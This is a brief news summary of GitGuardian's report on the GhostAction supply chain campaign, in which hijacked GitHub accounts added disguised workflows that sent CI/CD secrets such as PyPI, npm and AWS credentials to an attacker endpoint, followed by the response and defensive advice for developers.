GitGuardian uncovered the GhostAction campaign, a large-scale supply chain attack that compromised 327 GitHub user accounts to inject malicious workflows and steal 3,325 secrets from CI/CD environments across 817 repositories. The attackers disguised the workflows as "Github Actions Security" and extracted sensitive credentials, such as PyPI tokens, npm tokens, DockerHub credentials, GitHub tokens, and AWS access keys, via HTTP POST requests to a controlled endpoint. Despite the breach, no malicious packages were published using the stolen credentials, but 24 packages remain at immediate risk of compromise. GitGuardian's swift response involved alerting affected users, collaborating with GitHub, npm, and PyPI security teams, and maintaining surveillance to prevent further exploitation. Developers are advised to audit repository access, monitor for unauthorized changes, and implement additional security measures to protect against similar attacks.